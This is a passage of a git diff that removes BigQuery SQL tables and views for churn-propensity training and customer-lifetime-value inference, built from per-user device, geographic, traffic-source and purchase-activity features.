*, - -- Adding a random number to the rows to shuffle them. - ROW_NUMBER() OVER (PARTITION BY churned ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30` ) - WHERE - rn <= ( - SELECT - -- Counting the number of churned users. - COUNT(churned) - FROM - `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30` - WHERE - churned = 1) -; - - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30_last_window` (processed_timestamp, data_split, diff --git a/sql/procedure/customer_lifetime_value_inference_preparation.sqlx b/sql/procedure/customer_lifetime_value_inference_preparation.sqlx index 497f4a7c..c635ed3c 100644 --- a/sql/procedure/customer_lifetime_value_inference_preparation.sqlx +++ b/sql/procedure/customer_lifetime_value_inference_preparation.sqlx @@ -485,248 +485,6 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_infe FROM `{{project_id}}.{{dataset}}.{{insert_table}}` ); -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_90` AS( - SELECT DISTINCT - -- Adding processed_timestamp column with current timestamp - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Adding feature_date column as it is - feature_date, - -- Adding user_pseudo_id column as it is - user_pseudo_id, - -- Selecting the last value of user_id for each user_pseudo_id and feature_date - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Selecting the last value of device_category for each user_pseudo_id and feature_date - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Selecting the last value of device_mobile_brand_name for each user_pseudo_id and feature_date - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Selecting the last value of device_mobile_model_name for each user_pseudo_id and feature_date - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Selecting the last value of device_os for each user_pseudo_id and feature_date - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Selecting the last value of device_language for each user_pseudo_id and feature_date - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Selecting the last value of device_web_browser for each user_pseudo_id and feature_date - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Selecting the last value of geo_sub_continent for each user_pseudo_id and feature_date - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Selecting the last value of geo_country for each user_pseudo_id and feature_date - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Selecting the last value of geo_region for each user_pseudo_id and feature_date - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Selecting the last value of geo_city for each user_pseudo_id and feature_date - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Selecting the last value of geo_metro for each user_pseudo_id and feature_date - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Selecting the last value of last_traffic_source_medium for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Selecting the last value of last_traffic_source_name for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Selecting the last value of last_traffic_source_source for each user_pseudo_id and feature_date - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Selecting the last value of first_traffic_source_medium for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Selecting the last value of first_traffic_source_name for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Selecting the last value of first_traffic_source_source for each user_pseudo_id and feature_date - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Selecting the last value of has_signed_in_with_user_id for each user_pseudo_id and feature_date - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Selecting the last value of active_users_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Selecting the last value of active_users_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Selecting the last value of active_users_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Selecting the last value of active_users_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Selecting the last value of active_users_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Selecting the last value of active_users_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Selecting the last value of purchases_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Selecting the last value of purchases_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Selecting the last value of purchases_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Selecting the last value of purchases_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Selecting the last value of purchases_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Selecting the last value of purchases_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Selecting the last value of visits_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Selecting the last value of visits_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Selecting the last value of visits_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Selecting the last value of visits_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Selecting the last value of visits_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Selecting the last value of visits_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Selecting the last value of view_items_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Selecting the last value of view_items_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Selecting the last value of view_items_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Selecting the last value of view_items_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Selecting the last value of view_items_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Selecting the last value of view_items_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Selecting the last value of add_to_carts_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Selecting the last value of add_to_carts_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Selecting the last value of add_to_carts_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Selecting the last value of add_to_carts_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Selecting the last value of add_to_carts_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Selecting the last value of add_to_carts_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Selecting the last value of checkouts_past_1_30_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Selecting the last value of checkouts_past_30_60_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Selecting the last value of checkouts_past_60_90_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Selecting the last value of checkouts_past_90_120_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Selecting the last value of checkouts_past_120_150_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Selecting the last value of checkouts_past_150_180_day for each user_pseudo_id and feature_date - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_180` AS( - SELECT DISTINCT - -- Retrieves the current timestamp when the query is executed. - CURRENT_TIMESTAMP() AS processed_timestamp, - -- The date for which the features are extracted. - feature_date, - -- The unique identifier for the user. - user_pseudo_id, - -- Extracts the last user ID for each user_pseudo_id and feature_date. - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Extracts the last device category for each user_pseudo_id and feature_date. - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Extracts the last device mobile brand name for each user_pseudo_id and feature_date. - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Extracts the last device mobile model name for each user_pseudo_id and feature_date. - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Extracts the last device operating system for each user_pseudo_id and feature_date. - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Extracts the last device language for each user_pseudo_id and feature_date. - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Extracts the last device web browser for each user_pseudo_id and feature_date. - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Extracts the last geo subcontinent for each user_pseudo_id and feature_date. - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Extracts the last geo country for each user_pseudo_id and feature_date. - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Extracts the last geo region for each user_pseudo_id and feature_date. - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Extracts the last geo city for each user_pseudo_id and feature_date. - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Extracts the last geo metro for each user_pseudo_id and feature_date. - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Extracts the last traffic source medium for each user_pseudo_id and feature_date. - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Extracts the last traffic source name for each user_pseudo_id and feature_date. - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Extracts the last traffic source source for each user_pseudo_id and feature_date. - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Extracts the last first traffic source medium for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Extracts the last first traffic source name for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Extracts the last first traffic source source for each user_pseudo_id and feature_date. - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Extracts the last has_signed_in_with_user_id for each user_pseudo_id and feature_date. - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Extracts the last active_users_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Extracts the last active_users_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Extracts the last active_users_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Extracts the last active_users_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Extracts the last active_users_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Extracts the last active_users_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Extracts the last purchases_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Extracts the last purchases_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Extracts the last purchases_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Extracts the last purchases_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Extracts the last purchases_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Extracts the last purchases_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Extracts the last visits_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Extracts the last visits_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Extracts the last visits_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Extracts the last visits_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Extracts the last visits_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Extracts the last visits_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Extracts the last view_items_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Extracts the last view_items_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Extracts the last view_items_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Extracts the last view_items_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Extracts the last view_items_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Extracts the last view_items_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Extracts the last add_to_carts_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Extracts the last add_to_carts_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Extracts the last add_to_carts_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Extracts the last add_to_carts_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Extracts the last add_to_carts_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Extracts the last add_to_carts_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Extracts the last checkouts_past_1_30_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Extracts the last checkouts_past_30_60_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Extracts the last checkouts_past_60_90_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Extracts the last checkouts_past_90_120_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Extracts the last checkouts_past_120_150_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Extracts the last checkouts_past_150_180_day for each user_pseudo_id and feature_date. - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_inference_180_30` (processed_timestamp, @@ -920,392 +678,3 @@ SELECT DISTINCT WHERE -- Filter only for one row for each user_pseudo_id user_row_order = 1; - - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_inference_180_90` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_inference_180_90", - description="View Purchase Propensity Inference dataset using 15 days back to predict 7 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day -FROM( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - 